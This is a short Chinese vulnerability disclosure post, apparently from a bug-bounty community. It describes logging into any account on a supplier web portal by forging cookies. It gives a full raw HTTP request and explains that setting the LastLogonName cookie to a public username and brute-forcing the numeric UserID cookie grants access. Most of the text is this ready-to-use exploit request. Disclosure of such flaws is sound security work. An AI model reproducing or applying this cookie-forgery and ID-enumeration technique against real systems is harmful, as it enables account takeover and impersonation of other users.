修改cookie实现登陆任意账号
只要知道用户名,就可以登陆系统
我的请求如下:
GET /Supplier/Application.aspx HTTP/1.1
Host: example.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36
Referer: Example Domain
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=; LPSState=1; LenovoID.UN=; s_cc=; mlti=; mlts=; mltn=; mltmapping=1; s_sq=; s_nr=; CurrentEmplID=; LastLogonName=ceshidl; Checksum=; UserID=53790
上述cookie参数中,只要填写LastLogonName和userid即可登陆系统。userid可通过暴力破解进行遍历猜测,LastLogonName就是用户名昵称,本来就是公开可见的。
本文迁移自知识星球“火线Zone”
